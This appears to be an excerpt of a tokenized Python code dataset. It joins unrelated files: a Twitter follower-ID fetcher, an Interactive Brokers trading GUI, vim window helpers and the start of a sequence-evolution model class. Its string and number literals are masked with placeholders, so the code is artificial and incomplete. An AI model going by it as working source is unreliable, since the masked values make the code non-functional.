( portion ) <EOL> err ( "<STR_LIT>" <EOL> % ( len ( users ) , len ( user_ids ) ) ) <EOL> break <EOL> return users <EOL> def follow_portion ( twitter , screen_name , cursor = - <NUM_LIT:1> , followers = True ) : <EOL> """<STR_LIT>""" <EOL> kwargs = dict ( screen_name = screen_name , cursor = cursor ) <EOL> if followers : <EOL> t = twitter . followers . ids ( ** kwargs ) <EOL> else : <EOL> t = twitter . friends . 
ids ( ** kwargs ) <EOL> return t [ '<STR_LIT>' ] , t [ '<STR_LIT>' ] <EOL> def follow ( twitter , screen_name , followers = True ) : <EOL> """<STR_LIT>""" <EOL> user_ids = [ ] <EOL> cursor = - <NUM_LIT:1> <EOL> fail = Fail ( ) <EOL> while True : <EOL> try : <EOL> portion , cursor = follow_portion ( twitter , screen_name , cursor , <EOL> followers ) <EOL> except TwitterError as e : <EOL> if e . e . code == <NUM_LIT> : <EOL> reason = ( "<STR_LIT>" <EOL> % ( "<STR_LIT>" if followers else "<STR_LIT>" ) ) <EOL> err ( "<STR_LIT>" % ( e . e . code , reason ) ) <EOL> break <EOL> elif e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" % e . e . code ) <EOL> rls = twitter . application . rate_limit_status ( ) <EOL> reset = rls . rate_limit_reset <EOL> reset = time . asctime ( time . localtime ( reset ) ) <EOL> delay = int ( rls . rate_limit_reset <EOL> - time . time ( ) ) + <NUM_LIT:5> <EOL> err ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( rls . rate_limit_limit , <EOL> reset , delay ) ) <EOL> fail . wait ( delay ) <EOL> continue <EOL> elif e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" <EOL> % e . e . code ) <EOL> else : <EOL> err ( "<STR_LIT>" % str ( e ) [ : <NUM_LIT> ] ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except urllib2 . URLError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except httplib . error as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except KeyError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> else : <EOL> new = - len ( user_ids ) <EOL> user_ids = list ( set ( user_ids + portion ) ) <EOL> new += len ( user_ids ) <EOL> what = "<STR_LIT>" % ( "<STR_LIT>" if followers else "<STR_LIT>" ) <EOL> err ( "<STR_LIT>" % ( screen_name , what , new ) ) <EOL> if cursor == <NUM_LIT:0> : <EOL> break <EOL> fail = Fail ( ) <EOL> return user_ids <EOL> def rate_limit_status ( twitter ) : <EOL> """<STR_LIT>""" <EOL> rls = twitter . application . 
rate_limit_status ( ) <EOL> print ( "<STR_LIT>" <EOL> % ( rls . rate_limit_remaining , rls . rate_limit_limit ) ) <EOL> print ( "<STR_LIT>" <EOL> % ( int ( rls . rate_limit_reset - time . time ( ) ) , <EOL> time . asctime ( time . localtime ( rls . rate_limit_reset ) ) ) ) <EOL> def main ( args = sys . argv [ <NUM_LIT:1> : ] ) : <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> try : <EOL> parse_args ( args , options ) <EOL> except GetoptError as e : <EOL> err ( "<STR_LIT>" % e ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> if not options [ '<STR_LIT>' ] and not options [ '<STR_LIT>' ] : <EOL> print ( __doc__ ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> if options [ '<STR_LIT>' ] : <EOL> oauth_filename = ( os . getenv ( "<STR_LIT>" , "<STR_LIT>" ) + os . sep <EOL> + "<STR_LIT>" ) <EOL> if not os . path . exists ( oauth_filename ) : <EOL> oauth_dance ( "<STR_LIT>" , CONSUMER_KEY , CONSUMER_SECRET , <EOL> oauth_filename ) <EOL> oauth_token , oauth_token_secret = read_token_file ( oauth_filename ) <EOL> auth = OAuth ( oauth_token , oauth_token_secret , CONSUMER_KEY , <EOL> CONSUMER_SECRET ) <EOL> else : <EOL> auth = NoAuth ( ) <EOL> twitter = Twitter ( auth = auth , api_version = '<STR_LIT>' , domain = '<STR_LIT>' ) <EOL> if options [ '<STR_LIT>' ] : <EOL> rate_limit_status ( twitter ) <EOL> return <EOL> for user in options [ '<STR_LIT>' ] : <EOL> user_ids , users = [ ] , { } <EOL> try : <EOL> user_ids = follow ( twitter , user , options [ '<STR_LIT>' ] ) <EOL> users = lookup ( twitter , user_ids ) <EOL> except KeyboardInterrupt as e : <EOL> err ( ) <EOL> err ( "<STR_LIT>" ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> for uid in user_ids : <EOL> if options [ '<STR_LIT>' ] : <EOL> try : <EOL> print ( str ( uid ) + "<STR_LIT:\t>" + users [ uid ] . encode ( "<STR_LIT:utf-8>" ) ) <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> try : <EOL> print ( users [ uid ] . 
encode ( "<STR_LIT:utf-8>" ) ) <EOL> except KeyError : <EOL> pass <EOL> if options [ '<STR_LIT>' ] : <EOL> err ( "<STR_LIT>" % ( user , len ( user_ids ) ) ) <EOL> else : <EOL> err ( "<STR_LIT>" % ( user , len ( user_ids ) ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from time import sleep <EOL> from PyQt4 . QtCore import ( SIGNAL , SLOT ) <EOL> from PyQt4 . QtGui import ( QApplication , QFileDialog , QDialog , QVBoxLayout , QHBoxLayout , QDialogButtonBox , <EOL> QTableView , QPushButton , QWidget , QLabel , QLineEdit , QGridLayout , QHeaderView ) <EOL> import ib <EOL> from ib . ext . Contract import Contract <EOL> from ib . opt import ibConnection , message <EOL> from ib . ext . Order import Order <EOL> import logger as logger <EOL> from qtpandas import DataFrameModel , TableView <EOL> from eventSystem import Sender <EOL> import numpy as np <EOL> import pandas <EOL> from pandas import DataFrame , Index <EOL> from datetime import datetime <EOL> import os <EOL> import datetime as dt <EOL> import time <EOL> priceTicks = { <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' , <NUM_LIT:6> : '<STR_LIT>' , <NUM_LIT:7> : '<STR_LIT>' , <NUM_LIT:9> : '<STR_LIT>' , <NUM_LIT> : '<STR_LIT>' } <EOL> timeFormat = "<STR_LIT>" <EOL> dateFormat = "<STR_LIT>" <EOL> def createContract ( symbol , secType = '<STR_LIT>' , exchange = '<STR_LIT>' , currency = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> contract = Contract ( ) <EOL> contract . m_symbol = symbol <EOL> contract . m_secType = secType <EOL> contract . m_exchange = exchange <EOL> contract . m_currency = currency <EOL> return contract <EOL> def _str2datetime ( s ) : <EOL> """<STR_LIT>""" <EOL> return datetime . strptime ( s , '<STR_LIT>' ) <EOL> def readActivityFlex ( fName ) : <EOL> """<STR_LIT>""" <EOL> import csv <EOL> rows = [ ] <EOL> with open ( fName , '<STR_LIT:rb>' ) as f : <EOL> reader = csv . reader ( f ) <EOL> for row in reader : <EOL> rows . append ( row ) <EOL> header = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> types = dict ( zip ( header , [ _str2datetime , str , int , float , float ] ) ) <EOL> idx = dict ( zip ( header , [ rows [ <NUM_LIT:0> ] . 
index ( h ) for h in header ] ) ) <EOL> data = dict ( zip ( header , [ [ ] for h in header ] ) ) <EOL> for row in rows [ <NUM_LIT:1> : ] : <EOL> print row <EOL> for col in header : <EOL> val = types [ col ] ( row [ idx [ col ] ] ) <EOL> data [ col ] . append ( val ) <EOL> return DataFrame ( data ) [ header ] . sort ( column = '<STR_LIT>' ) <EOL> class Subscriptions ( DataFrameModel , Sender ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tws = None ) : <EOL> super ( Subscriptions , self ) . __init__ ( ) <EOL> self . df = DataFrame ( ) <EOL> self . _nextId = <NUM_LIT:1> <EOL> self . _id2symbol = { } <EOL> self . _header = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if tws is not None : <EOL> tws . register ( self . priceHandler , message . TickPrice ) <EOL> tws . register ( self . accountHandler , message . UpdatePortfolio ) <EOL> def add ( self , symbol , subId = None ) : <EOL> """<STR_LIT>""" <EOL> if subId is None : <EOL> subId = self . _nextId <EOL> data = dict ( zip ( self . _header , [ subId , <NUM_LIT:0> , np . nan , np . nan , np . nan ] ) ) <EOL> row = DataFrame ( data , index = Index ( [ symbol ] ) ) <EOL> self . df = self . df . append ( row [ self . _header ] ) <EOL> self . _nextId = subId + <NUM_LIT:1> <EOL> self . _rebuildIndex ( ) <EOL> self . emit ( SIGNAL ( "<STR_LIT>" ) ) <EOL> return subId <EOL> def priceHandler ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> if priceTicks [ msg . field ] not in self . _header : <EOL> return <EOL> self . df [ priceTicks [ msg . field ] ] [ self . _id2symbol [ msg . tickerId ] ] = msg . price <EOL> col = self . _header . index ( priceTicks [ msg . field ] ) <EOL> row = self . df . index . tolist ( ) . index ( self . _id2symbol [ msg . tickerId ] ) <EOL> idx = self . createIndex ( row , col ) <EOL> self . emit ( SIGNAL ( "<STR_LIT>" ) , idx , idx ) <EOL> def accountHandler ( self , msg ) : <EOL> if msg . contract . m_symbol in self . df . index . tolist ( ) : <EOL> self . 
df [ '<STR_LIT>' ] [ msg . contract . m_symbol ] = msg . position <EOL> def _rebuildIndex ( self ) : <EOL> """<STR_LIT>""" <EOL> symbols = self . df . index . tolist ( ) <EOL> ids = self . df [ '<STR_LIT:id>' ] . values . tolist ( ) <EOL> self . _id2symbol = dict ( zip ( ids , symbols ) ) <EOL> def __repr__ ( self ) : <EOL> return str ( self . df ) <EOL> class Broker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . log = logger . getLogger ( self . name ) <EOL> self . log . debug ( '<STR_LIT>' . format ( pandas . __version__ ) ) <EOL> self . contracts = { } <EOL> self . tws = ibConnection ( ) <EOL> self . nextValidOrderId = None <EOL> self . dataModel = Subscriptions ( self . tws ) <EOL> self . tws . registerAll ( self . defaultHandler ) <EOL> self . tws . register ( self . nextValidIdHandler , '<STR_LIT>' ) <EOL> self . log . debug ( '<STR_LIT>' ) <EOL> self . tws . connect ( ) <EOL> self . tws . reqAccountUpdates ( True , '<STR_LIT>' ) <EOL> def subscribeStk ( self , symbol , secType = '<STR_LIT>' , exchange = '<STR_LIT>' , currency = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . log . debug ( '<STR_LIT>' + symbol ) <EOL> c = Contract ( ) <EOL> c . m_symbol = symbol <EOL> c . m_secType = secType <EOL> c . m_exchange = exchange <EOL> c . m_currency = currency <EOL> subId = self . dataModel . add ( symbol ) <EOL> self . tws . reqMktData ( subId , c , '<STR_LIT>' , False ) <EOL> self . contracts [ symbol ] = c <EOL> return subId <EOL> @ property <EOL> def data ( self ) : <EOL> return self . dataModel . df <EOL> def placeOrder ( self , symbol , shares , limit = None , exchange = '<STR_LIT>' , transmit = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if symbol not in self . contracts . keys ( ) : <EOL> self . log . error ( "<STR_LIT>" % symbol ) <EOL> return <EOL> action = { - <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:1> : '<STR_LIT>' } <EOL> o = Order ( ) <EOL> o . 
m_orderId = self . getOrderId ( ) <EOL> o . m_action = action [ cmp ( shares , <NUM_LIT:0> ) ] <EOL> o . m_totalQuantity = abs ( shares ) <EOL> o . m_transmit = transmit <EOL> if limit is not None : <EOL> o . m_orderType = '<STR_LIT>' <EOL> o . m_lmtPrice = limit <EOL> self . log . debug ( '<STR_LIT>' % ( o . m_action , o . m_totalQuantity , symbol , o . m_orderId ) ) <EOL> self . tws . placeOrder ( o . m_orderId , self . contracts [ symbol ] , o ) <EOL> def getOrderId ( self ) : <EOL> self . nextValidOrderId += <NUM_LIT:1> <EOL> return self . nextValidOrderId - <NUM_LIT:1> <EOL> def unsubscribeStk ( self , symbol ) : <EOL> self . log . debug ( '<STR_LIT>' ) <EOL> def disconnect ( self ) : <EOL> self . tws . disconnect ( ) <EOL> def __del__ ( self ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' <EOL> self . tws . disconnect ( ) <EOL> def debugHandler ( self , msg ) : <EOL> print msg <EOL> def defaultHandler ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> if msg . typeName == '<STR_LIT>' : <EOL> self . log . error ( msg ) <EOL> def nextValidIdHandler ( self , msg ) : <EOL> self . nextValidOrderId = msg . orderId <EOL> self . log . debug ( '<STR_LIT>' . format ( self . nextValidOrderId ) ) <EOL> def saveData ( self , fname ) : <EOL> """<STR_LIT>""" <EOL> self . log . debug ( "<STR_LIT>" . format ( fname ) ) <EOL> self . dataModel . df . to_csv ( fname ) <EOL> class _HistDataHandler ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tws ) : <EOL> self . _log = logger . getLogger ( '<STR_LIT>' ) <EOL> tws . register ( self . msgHandler , message . HistoricalData ) <EOL> self . reset ( ) <EOL> def reset ( self ) : <EOL> self . _log . debug ( '<STR_LIT>' ) <EOL> self . dataReady = False <EOL> self . _timestamp = [ ] <EOL> self . _data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT:count>' : [ ] , '<STR_LIT>' : [ ] } <EOL> def msgHandler ( self , msg ) : <EOL> if msg . 
date [ : <NUM_LIT:8> ] == '<STR_LIT>' : <EOL> self . _log . debug ( '<STR_LIT>' ) <EOL> self . dataReady = True <EOL> return <EOL> if len ( msg . date ) > <NUM_LIT:8> : <EOL> self . _timestamp . append ( dt . datetime . strptime ( msg . date , timeFormat ) ) <EOL> else : <EOL> self . _timestamp . append ( dt . datetime . strptime ( msg . date , dateFormat ) ) <EOL> for k in self . _data . keys ( ) : <EOL> self . _data [ k ] . append ( getattr ( msg , k ) ) <EOL> @ property <EOL> def data ( self ) : <EOL> """<STR_LIT>""" <EOL> df = DataFrame ( data = self . _data , index = Index ( self . _timestamp ) ) <EOL> return df <EOL> class Downloader ( object ) : <EOL> def __init__ ( self , debug = False ) : <EOL> self . _log = logger . getLogger ( '<STR_LIT>' ) <EOL> self . _log . debug ( <EOL> '<STR_LIT>' . format ( pandas . __version__ , ib . version ) ) <EOL> self . tws = ibConnection ( ) <EOL> self . _dataHandler = _HistDataHandler ( self . tws ) <EOL> if debug : <EOL> self . tws . registerAll ( self . _debugHandler ) <EOL> self . tws . unregister ( self . _debugHandler , message . HistoricalData ) <EOL> self . _log . debug ( '<STR_LIT>' ) <EOL> self . tws . connect ( ) <EOL> self . _timeKeeper = TimeKeeper ( ) <EOL> self . _reqId = <NUM_LIT:1> <EOL> def _debugHandler ( self , msg ) : <EOL> print '<STR_LIT>' , msg <EOL> def requestData ( self , contract , endDateTime , durationStr = '<STR_LIT>' , barSizeSetting = '<STR_LIT>' , whatToShow = '<STR_LIT>' , <EOL> useRTH = <NUM_LIT:1> , formatDate = <NUM_LIT:1> ) : <EOL> self . _log . debug ( '<STR_LIT>' % ( contract . m_symbol , endDateTime ) ) <EOL> while self . _timeKeeper . nrRequests ( timeSpan = <NUM_LIT> ) > <NUM_LIT> : <EOL> print '<STR_LIT>' <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> self . _timeKeeper . addRequest ( ) <EOL> self . _dataHandler . reset ( ) <EOL> self . tws . reqHistoricalData ( self . _reqId , contract , endDateTime , durationStr , barSizeSetting , whatToShow , useRTH , <EOL> formatDate ) <EOL> self . 
_reqId += <NUM_LIT:1> <EOL> startTime = time . time ( ) <EOL> timeout = <NUM_LIT:3> <EOL> while not self . _dataHandler . dataReady and ( time . time ( ) - startTime < timeout ) : <EOL> sleep ( <NUM_LIT:2> ) <EOL> if not self . _dataHandler . dataReady : <EOL> self . _log . error ( '<STR_LIT>' ) <EOL> print self . _dataHandler . data <EOL> return self . _dataHandler . data <EOL> def getIntradayData ( self , contract , dateTuple ) : <EOL> """<STR_LIT>""" <EOL> openTime = dt . datetime ( * dateTuple ) + dt . timedelta ( hours = <NUM_LIT:16> ) <EOL> closeTime = dt . datetime ( * dateTuple ) + dt . timedelta ( hours = <NUM_LIT> ) <EOL> timeRange = pandas . date_range ( openTime , closeTime , freq = '<STR_LIT>' ) <EOL> datasets = [ ] <EOL> for t in timeRange : <EOL> datasets . append ( self . requestData ( contract , t . strftime ( timeFormat ) ) ) <EOL> return pandas . concat ( datasets ) <EOL> def disconnect ( self ) : <EOL> self . tws . disconnect ( ) <EOL> class TimeKeeper ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _log = logger . getLogger ( '<STR_LIT>' ) <EOL> dataDir = os . path . expanduser ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> if not os . path . exists ( dataDir ) : <EOL> os . mkdir ( dataDir ) <EOL> self . _timeFormat = "<STR_LIT>" <EOL> self . dataFile = os . path . normpath ( os . path . join ( dataDir , '<STR_LIT>' ) ) <EOL> self . _log . debug ( '<STR_LIT>' . format ( self . dataFile ) ) <EOL> def addRequest ( self ) : <EOL> """<STR_LIT>""" <EOL> with open ( self . dataFile , '<STR_LIT:a>' ) as f : <EOL> f . write ( dt . datetime . now ( ) . strftime ( self . _timeFormat ) + '<STR_LIT:\n>' ) <EOL> def nrRequests ( self , timeSpan = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> delta = dt . timedelta ( seconds = timeSpan ) <EOL> now = dt . datetime . now ( ) <EOL> requests = <NUM_LIT:0> <EOL> with open ( self . dataFile , '<STR_LIT:r>' ) as f : <EOL> lines = f . readlines ( ) <EOL> for line in lines : <EOL> if now - dt . datetime . strptime ( line . 
strip ( ) , self . _timeFormat ) < delta : <EOL> requests += <NUM_LIT:1> <EOL> if requests == <NUM_LIT:0> : <EOL> open ( self . dataFile , '<STR_LIT:w>' ) . close ( ) <EOL> self . _log . debug ( '<STR_LIT>' . format ( requests ) ) <EOL> return requests <EOL> def dummyHandler ( msg ) : <EOL> print msg <EOL> def testConnection ( ) : <EOL> """<STR_LIT>""" <EOL> tws = ibConnection ( ) <EOL> tws . registerAll ( dummyHandler ) <EOL> tws . connect ( ) <EOL> c = createContract ( '<STR_LIT>' ) <EOL> tws . reqMktData ( <NUM_LIT:1> , c , '<STR_LIT>' , False ) <EOL> sleep ( <NUM_LIT:3> ) <EOL> print '<STR_LIT>' <EOL> def testSubscriptions ( ) : <EOL> s = Subscriptions ( ) <EOL> s . add ( '<STR_LIT>' ) <EOL> print s <EOL> def testBroker ( ) : <EOL> b = Broker ( ) <EOL> sleep ( <NUM_LIT:2> ) <EOL> b . subscribeStk ( '<STR_LIT>' ) <EOL> b . subscribeStk ( '<STR_LIT>' ) <EOL> b . subscribeStk ( '<STR_LIT>' ) <EOL> b . placeOrder ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) <EOL> sleep ( <NUM_LIT:3> ) <EOL> return b <EOL> class AddSubscriptionDlg ( QDialog ) : <EOL> def __init__ ( self , parent = None ) : <EOL> super ( AddSubscriptionDlg , self ) . __init__ ( parent ) <EOL> symbolLabel = QLabel ( '<STR_LIT>' ) <EOL> self . symbolEdit = QLineEdit ( ) <EOL> secTypeLabel = QLabel ( '<STR_LIT>' ) <EOL> self . secTypeEdit = QLineEdit ( '<STR_LIT>' ) <EOL> exchangeLabel = QLabel ( '<STR_LIT>' ) <EOL> self . exchangeEdit = QLineEdit ( '<STR_LIT>' ) <EOL> currencyLabel = QLabel ( '<STR_LIT>' ) <EOL> self . currencyEdit = QLineEdit ( '<STR_LIT>' ) <EOL> buttonBox = QDialogButtonBox ( QDialogButtonBox . Ok | <EOL> QDialogButtonBox . Cancel ) <EOL> lay = QGridLayout ( ) <EOL> lay . addWidget ( symbolLabel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . symbolEdit , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> lay . addWidget ( secTypeLabel , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . secTypeEdit , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> lay . 
addWidget ( exchangeLabel , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . exchangeEdit , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> lay . addWidget ( currencyLabel , <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . currencyEdit , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> lay . addWidget ( buttonBox , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . setLayout ( lay ) <EOL> self . connect ( buttonBox , SIGNAL ( "<STR_LIT>" ) , <EOL> self , SLOT ( "<STR_LIT>" ) ) <EOL> self . connect ( buttonBox , SIGNAL ( "<STR_LIT>" ) , <EOL> self , SLOT ( "<STR_LIT>" ) ) <EOL> self . setWindowTitle ( "<STR_LIT>" ) <EOL> class BrokerWidget ( QWidget ) : <EOL> def __init__ ( self , broker , parent = None ) : <EOL> super ( BrokerWidget , self ) . __init__ ( parent ) <EOL> self . broker = broker <EOL> self . dataTable = TableView ( ) <EOL> self . dataTable . setModel ( self . broker . dataModel ) <EOL> self . dataTable . horizontalHeader ( ) . setResizeMode ( QHeaderView . Stretch ) <EOL> dataLabel = QLabel ( '<STR_LIT>' ) <EOL> dataLabel . setBuddy ( self . dataTable ) <EOL> dataLayout = QVBoxLayout ( ) <EOL> dataLayout . addWidget ( dataLabel ) <EOL> dataLayout . addWidget ( self . dataTable ) <EOL> addButton = QPushButton ( "<STR_LIT>" ) <EOL> saveDataButton = QPushButton ( "<STR_LIT>" ) <EOL> buttonLayout = QVBoxLayout ( ) <EOL> buttonLayout . addWidget ( addButton ) <EOL> buttonLayout . addWidget ( saveDataButton ) <EOL> buttonLayout . addStretch ( ) <EOL> layout = QHBoxLayout ( ) <EOL> layout . addLayout ( dataLayout ) <EOL> layout . addLayout ( buttonLayout ) <EOL> self . setLayout ( layout ) <EOL> self . connect ( addButton , SIGNAL ( '<STR_LIT>' ) , self . addSubscription ) <EOL> self . connect ( saveDataButton , SIGNAL ( '<STR_LIT>' ) , self . saveData ) <EOL> def addSubscription ( self ) : <EOL> dialog = AddSubscriptionDlg ( self ) <EOL> if dialog . exec_ ( ) : <EOL> self . broker . subscribeStk ( str ( dialog . symbolEdit . 
text ( ) ) , str ( dialog . secTypeEdit . text ( ) ) , <EOL> str ( dialog . exchangeEdit . text ( ) ) , str ( dialog . currencyEdit . text ( ) ) ) <EOL> def saveData ( self ) : <EOL> """<STR_LIT>""" <EOL> fname = unicode ( QFileDialog . getSaveFileName ( self , caption = "<STR_LIT>" , filter = '<STR_LIT>' ) ) <EOL> if fname : <EOL> self . broker . saveData ( fname ) <EOL> class Form ( QDialog ) : <EOL> def __init__ ( self , parent = None ) : <EOL> super ( Form , self ) . __init__ ( parent ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . setWindowTitle ( '<STR_LIT>' ) <EOL> self . broker = Broker ( ) <EOL> self . broker . subscribeStk ( '<STR_LIT>' ) <EOL> self . broker . subscribeStk ( '<STR_LIT>' ) <EOL> self . broker . subscribeStk ( '<STR_LIT>' ) <EOL> brokerWidget = BrokerWidget ( self . broker , self ) <EOL> lay = QVBoxLayout ( ) <EOL> lay . addWidget ( brokerWidget ) <EOL> self . setLayout ( lay ) <EOL> def startGui ( ) : <EOL> app = QApplication ( sys . argv ) <EOL> form = Form ( ) <EOL> form . show ( ) <EOL> app . exec_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import ib <EOL> print '<STR_LIT>' , ib . version <EOL> print message . messageTypeNames ( ) <EOL> startGui ( ) <EOL> print '<STR_LIT>' </s>
<s> import vim <EOL> def focus ( winnr ) : <EOL> vim . command ( '<STR_LIT>' % winnr ) <EOL> def close ( winnr ) : <EOL> focus ( winnr ) <EOL> vim . command ( '<STR_LIT>' ) <EOL> def close_all ( ) : <EOL> for winnr in range ( len ( vim . windows ) - <NUM_LIT:1> ) : <EOL> close ( winnr ) <EOL> def split ( ) : <EOL> vim . command ( '<STR_LIT>' ) <EOL> def vsplit ( ) : <EOL> vim . command ( '<STR_LIT>' ) <EOL> def currentnr ( ) : <EOL> return int ( vim . eval ( '<STR_LIT>' ) ) <EOL> def pos ( ) : <EOL> return vim . current . window . cursor <EOL> class remain : <EOL> def __enter__ ( self ) : <EOL> self . curwindow = currentnr ( ) <EOL> self . pos = pos ( ) <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> focus ( self . curwindow ) <EOL> vim . current . window . cursor = self . pos </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> from copy import deepcopy <EOL> from matrix_builder import * <EOL> from genetics import * <EOL> from parameters_sanity import * <EOL> from scipy . stats import gamma <EOL> from scipy . special import gammainc <EOL> import warnings <EOL> ZERO = <NUM_LIT> <EOL> MOLECULES = Genetics ( ) <EOL> class Model ( ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , model_type , parameters = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . model_type = model_type . lower ( ) <EOL> if parameters is None : <EOL> self . params = { } <EOL> else : <EOL> self . params = parameters <EOL> self . name = kwargs . get ( '<STR_LIT:name>' , None ) <EOL> self . rate_probs = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . rate_factors = kwargs . get ( '<STR_LIT>' , np . ones ( <NUM_LIT:1> ) ) <EOL> self . alpha = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . k_gamma = kwargs . get ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> self . pinv = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0.> ) <EOL> self . _save_custom_matrix_freqs = kwargs . get ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . code = None <EOL> self . aa_models = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _check_acceptable_model ( ) <EOL> self . _check_hetcodon_model ( ) <EOL> self . _construct_model ( ) <EOL> def _assign_code ( self ) : <EOL> '''<STR_LIT>''' <EOL> if "<STR_LIT:code>" in self . params : <EOL> self . code = self . params [ "<STR_LIT:code>" ] <EOL> else : <EOL> dim = len ( self . params [ '<STR_LIT>' ] ) <EOL> if dim == <NUM_LIT:4> : <EOL> self . code = MOLECULES . nucleotides <EOL> elif dim == <NUM_LIT:20> : <EOL> self . code = MOLECULES . amino_acids <EOL> elif dim == <NUM_LIT> : <EOL> self . code = MOLECULES . codons <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _check_acceptable_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . model_type = self . model_type . 
replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> accepted_models = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] + self . aa_models <EOL> assert ( self . model_type in accepted_models ) , "<STR_LIT>" <EOL> assert ( type ( self . params ) is dict ) , "<STR_LIT>" <EOL> if self . model_type == '<STR_LIT>' : <EOL> self . model_type = '<STR_LIT>' <EOL> print ( "<STR_LIT>" ) <EOL> if self . model_type == '<STR_LIT>' : <EOL> self . model_type = '<STR_LIT>' <EOL> print ( "<STR_LIT>" ) <EOL> if self . model_type == '<STR_LIT>' : <EOL> assert ( "<STR_LIT>" in self . params ) , "<STR_LIT>" <EOL> if "<STR_LIT>" in self . params : <EOL> warn ( "<STR_LIT>" , self . _save_custom_matrix_freqs , "<STR_LIT:.>" ) <EOL> def _check_hetcodon_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . hetcodon_model = False <EOL> if "<STR_LIT>" in self . params : <EOL> self . params [ "<STR_LIT>" ] = self . params [ "<STR_LIT>" ] <EOL> self . params . pop ( "<STR_LIT>" ) <EOL> try : <EOL> ( x for x in self . params [ "<STR_LIT>" ] ) <EOL> self . hetcodon_model = True <EOL> except : <EOL> self . hetcodon_model = False <EOL> def _construct_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . hetcodon_model : <EOL> self . _assign_rate_probs ( ) <EOL> else : <EOL> self . _assign_rates ( ) <EOL> self . _assign_matrix ( ) <EOL> self . _assign_code ( ) <EOL> def _assign_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . model_type == '<STR_LIT>' : <EOL> self . params = Nucleotide_Sanity ( self . model_type , self . params , size = <NUM_LIT:4> ) ( ) <EOL> self . matrix = Nucleotide_Matrix ( self . model_type , self . params ) ( ) <EOL> elif self . model_type in self . aa_models : <EOL> self . params = AminoAcid_Sanity ( self . model_type , self . params , size = <NUM_LIT:20> ) ( ) <EOL> self . matrix = AminoAcid_Matrix ( self . model_type , self . params ) ( ) <EOL> elif self . model_type == '<STR_LIT>' or self . 
